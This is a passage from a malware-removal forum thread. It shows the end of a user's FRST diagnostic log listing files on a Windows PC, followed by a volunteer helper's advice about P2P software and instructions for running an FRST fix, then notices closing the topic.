2014-10-17 10:55 - 2014-10-17 10:55 - 04862664 _____ (AVAST Software) C:\Users\Ashley\Desktop\avast_free_antivirus_setup_online.exe
2014-10-17 10:54 - 2014-10-17 10:54 - 01055936 _____ (Adobe) C:\Users\Ashley\Desktop\install_flashplayer15x32axau_mssd_aaa_aih.exe
2014-10-17 10:49 - 2014-10-19 15:25 - 00005396 _____ () C:\Windows\PFRO.log
2014-10-17 10:49 - 2014-10-17 10:50 - 05599416 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 08:53 - 2014-10-17 08:53 - 00000000 ____D () C:\Users\Ashley\aaaebookszip
2014-10-15 09:39 - 2014-10-15 10:01 - 00000000 ____D () C:\Users\Study\Desktop\Oct2014Pix
2014-10-15 09:26 - 2014-10-15 09:38 - 00000000 ____D () C:\Users\Study\Desktop\October2014Vids
2014-10-14 08:42 - 2014-10-14 08:42 - 00000000 ____D () C:\Users\Study\AppData\Roaming\WinRAR
2014-10-14 08:40 - 2014-10-14 08:51 - 00000000 ____D () C:\Users\Study\Desktop\Outlook 2013 Screenshots
2014-10-14 08:34 - 2014-10-17 16:05 - 00000680 _____ () C:\Users\Study\AppData\Local\d3d9caps.dat
2014-10-13 15:24 - 2014-10-13 15:24 - 07050784 _____ () C:\Users\Study\Downloads\Guide to Computer User Support for Help Desk and Support Specialists, A - Beisse.epub
2014-10-13 14:53 - 2014-10-13 14:53 - 00000000 ____D () C:\Users\Study\AppData\Local\Adobe
2014-10-13 14:38 - 2014-10-17 17:25 - 00000000 ____D () C:\Users\Study\AppData\Roaming\deluge
2014-10-13 14:19 - 2014-10-13 14:19 - 00000780 _____ () C:\Users\Public\Desktop\Deluge.lnk
2014-10-13 11:58 - 2014-10-13 11:58 - 00001987 _____ () C:\Users\Study\Desktop\Google Chrome.lnk
2014-10-13 11:52 - 2014-10-13 15:35 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Adobe
2014-10-13 11:52 - 2014-10-13 11:52 - 00000000 ____D () C:\Users\Study\AppData\Local\Stardock_Corporation
2014-10-13 11:51 - 2014-10-13 11:51 - 00244368 _____ () C:\Users\Study\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-13 11:51 - 2014-10-13 11:51 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Dell
2014-10-13 11:49 - 2014-10-17 16:21 - 00000000 ____D () C:\Users\Study
2014-10-13 11:49 - 2014-10-13 11:57 - 00000000 ____D () C:\Users\Study\AppData\Local\Google
2014-10-13 11:49 - 2014-10-13 11:49 - 00000951 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000941 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000936 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000917 _____ () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows Mail.lnk
2014-10-13 11:49 - 2014-10-13 11:49 - 00000020 ___SH () C:\Users\Study\ntuser.ini
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Apple Computer
2014-10-13 11:49 - 2014-10-13 11:49 - 00000000 ____D () C:\Users\Study\AppData\Local\MediaDirect
2014-10-13 11:49 - 2014-03-16 11:06 - 00000000 ____D () C:\Users\Study\AppData\Roaming\IObit
2014-10-13 11:49 - 2011-07-23 17:03 - 00000000 ____D () C:\Users\Study\AppData\Roaming\Macromedia
2014-10-13 11:49 - 2009-10-13 04:15 - 00000000 ____D () C:\Users\Study\AppData\Local\Microsoft Help
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-13 11:49 - 2008-01-20 20:20 - 00000000 ___RD () C:\Users\Study\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-10 13:31 - 2014-10-10 13:31 - 00003098 _____ () C:\Windows\System32\Tasks\{0E00E117-897C-40D1-869B-22B9CCA0F27C}
2014-10-10 10:22 - 2014-10-10 10:23 - 31766208 _____ (Microsoft Corporation) C:\Users\Ashley\Downloads\Windows-KB890830-x64-V5.16.exe
2014-10-10 09:51 - 2014-10-19 15:27 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-10 09:51 - 2014-10-10 09:51 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\48230029.sys
2014-10-10 09:43 - 2014-10-10 09:43 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-10-10 09:43 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-10 09:42 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Zahyqe
2014-10-09 15:42 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Uxbuxy
2014-10-09 15:41 - 2014-10-09 15:41 - 00081408 _____ () C:\Windows\system32\mpcete.dll
2014-10-09 15:41 - 2014-10-09 15:41 - 00003858 _____ () C:\Windows\System32\Tasks\{B5CED0A0-FE3D-C163-11B3-D01C230EF0A0}
2014-10-09 15:41 - 2014-10-09 15:41 - 00000000 _____ () C:\Windows\system32\rfbju.dll
2014-10-09 13:20 - 2014-10-09 13:20 - 00064443 _____ () C:\Users\Ashley\Downloads\docs.zip
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Deluge
2014-10-08 09:05 - 2014-10-08 09:05 - 00000000 ____D () C:\Program Files (x86)\Deluge
2014-10-08 09:04 - 2014-10-08 09:04 - 13590162 _____ () C:\Users\Ashley\Downloads\deluge-1.3.9-win32-setup.exe
2014-10-08 09:02 - 2014-10-08 09:02 - 00003038 _____ () C:\Windows\System32\Tasks\{592F96FF-345C-4DC9-A076-6BD9C5A145DA}
2014-09-30 14:18 - 2014-10-10 12:14 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Xepoxyo
2014-09-30 10:03 - 2014-09-30 10:14 - 00001090 _____ () C:\Users\Guest\Desktop\ScottsdaleInsPhoneInterviewNotes.txt
2014-09-26 18:14 - 2014-09-26 18:14 - 00001489 _____ () C:\Users\Guest\Desktop\gtz.txt
2014-09-24 10:54 - 2014-09-24 17:28 - 00004003 _____ () C:\Users\Guest\Desktop\depr.txt
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-19 16:56 - 2012-09-29 15:45 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-19 16:51 - 2009-10-18 15:53 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-19 16:26 - 2012-09-29 15:56 - 00000940 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500UA.job
2014-10-19 15:26 - 2013-10-16 15:07 - 00000000 ____D () C:\Users\Ashley\AppData\Local\Deployment
2014-10-19 15:26 - 2008-12-22 12:22 - 00000000 ____D () C:\ProgramData\TEMP
2014-10-19 15:25 - 2009-10-18 15:53 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-19 15:25 - 2006-11-02 08:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 15:25 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-19 15:25 - 2006-11-02 08:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-19 15:24 - 2014-02-16 17:49 - 00000000 ____D () C:\AdwCleaner
2014-10-19 15:24 - 2006-11-02 08:42 - 00032554 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-19 15:11 - 2014-01-05 20:42 - 00000000 ____D () C:\Users\Ashley\Desktop\wirelesskeyview-x64
2014-10-19 15:09 - 2014-01-02 15:19 - 00000000 ____D () C:\Users\Ashley\Desktop\Desktop Folders
2014-10-18 13:14 - 2009-09-29 18:02 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-18 12:26 - 2012-09-29 15:56 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-2293499177-2261026601-659138957-500Core.job
2014-10-17 21:46 - 2009-10-18 15:53 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-17 21:46 - 2009-10-18 15:53 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-17 14:26 - 2009-06-01 22:38 - 00000000 ____D () C:\Program Files (x86)\FLAC
2014-10-17 11:37 - 2008-12-23 14:57 - 00006080 _____ () C:\Users\Ashley\AppData\Local\d3d9caps.dat
2014-10-17 11:37 - 2008-12-22 17:50 - 00000000 ____D () C:\Users\RA Media Server
2014-10-17 11:10 - 2008-12-22 19:44 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\uTorrent
2014-10-17 10:48 - 2006-11-02 06:33 - 00000000 __RSD () C:\Windows\Media
2014-10-17 10:10 - 2008-12-25 17:52 - 00000000 ____D () C:\Windows\Minidump
2014-10-17 09:57 - 2013-07-18 18:11 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 09:10 - 2006-11-02 05:35 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-10-17 08:53 - 2008-12-22 12:21 - 00000000 ____D () C:\Users\Ashley
2014-10-14 11:41 - 2009-05-12 15:42 - 00000000 ____D () C:\ProgramData\Lx_cats
2014-10-14 09:49 - 2010-08-07 21:50 - 00006080 _____ () C:\Users\Guest\AppData\Local\d3d9caps.dat
2014-10-10 14:07 - 2012-04-26 14:19 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service
2014-10-10 13:29 - 2013-11-27 23:16 - 00000000 ____D () C:\ProgramData\Origin
2014-10-10 13:29 - 2008-12-26 16:54 - 00000000 ____D () C:\ProgramData\Electronic Arts
2014-10-10 13:11 - 2009-11-24 21:51 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Notepad++
2014-10-10 12:47 - 2014-07-01 16:25 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-10-10 12:14 - 2006-11-02 06:33 - 00000000 ____D () C:\Windows\security
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\Users\Ashley\Desktop\secprogs
2014-10-10 11:23 - 2014-03-27 07:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paterva
2014-10-10 09:43 - 2009-04-06 21:09 - 00000000 ____D () C:\Users\Ashley\AppData\Roaming\Malwarebytes
2014-10-10 09:42 - 2011-07-13 15:01 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-10 09:42 - 2009-04-06 21:09 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-09 12:26 - 2010-07-04 19:51 - 00000000 ____D () C:\Users\Guest\AppData\Roaming\Mozilla
2014-10-01 09:51 - 2014-03-15 11:59 - 00000000 ____D () C:\Users\Guest\Desktop\Old Firefox Data
2014-09-26 10:09 - 2010-07-04 19:48 - 00000000 ____D () C:\Users\Guest
2014-09-23 15:56 - 2012-09-29 15:45 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-23 15:56 - 2012-09-29 15:45 - 00003684 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-23 15:56 - 2011-05-14 05:53 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
 
Files to move or delete:
====================
C:\Users\Ashley\1535_A06.EXE
C:\Users\Ashley\jagex_runescape_preferences.dat
C:\Users\Ashley\R182272_DellVideoChat_Setup_support.exe
C:\Users\Ashley\R186378.exe
C:\Users\Ashley\R197267.exe
 
 
Some content of TEMP:
====================
C:\Users\Administrator\AppData\Local\Temp\gtalkwmp1.dll
C:\Users\Ashley\AppData\Local\Temp\dllnt_dump.dll
C:\Users\Ashley\AppData\Local\Temp\Quarantine.exe
C:\Users\Ashley\AppData\Local\Temp\sqlite3.dll
C:\Users\Games\AppData\Local\Temp\AutoRun.exe
C:\Users\Games\AppData\Local\Temp\AutoRunGUI.dll
C:\Users\Games\AppData\Local\Temp\uttAC59.tmp.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-19 15:37
 
==================== End Of Log ============================


#4 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 3,976 posts
  • Gender:Male
  • Location:Germany

Posted 20 October 2014 - 12:01 AM

2014-10-17 08:53 - 2014-10-17 08:53 - 00000000 ____D () C:\Users\Ashley\aaaebookszip

Do you know this folder?

 

IMPORTANT: I see you have one or more P2P (Peer to Peer) programs installed.

1.) You have the following P2P program installed: uTorrent
2.) If you download files from non-documented sources per a P2P File sharing Program, you can expect an infection of malware. That isn't good for your PC. A long time ago File-sharing with P2P programs like uTorrent was fairly safe. But at this time it isn't true any more. Of course you can use P2P programs at your own risk, but that is maybe the source of your infection. It would be nice if you read this here. So after reading the text you will recognize why you shouldn't have them.
3.) Please read these reports about the danger of P2P Programs:
4.) I would recommend that you uninstall the above. That would be nice. If you like to uninstall the P2P Program, you can do it via Start >> Control Panel >> Add or Remove Programs
5.) If you want to keep the program on your computer, don't use it while we are fixing your computer!

 

First,
  • Please download the attached fixlist.txt file and save it to the same location as FRST
Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt are in the same location or the fix will not work
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run. Please post it in your reply
Then,
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.


~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.



#5 Machiavelli


Posted 24 October 2014 - 12:45 PM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

~Machiavelli



#6 Machiavelli


Posted 27 October 2014 - 04:32 AM

User returned.

~Machiavelli



#7 Machiavelli


Posted 31 October 2014 - 04:36 AM

Due to the lack of feedback, this topic is now closed.

In the event you still have problems, please send me or any Moderator a Private Message and ask them to reopen this topic within the next 5 days.

Please include a link to your topic in the Private Message. Thank you.

~Machiavelli





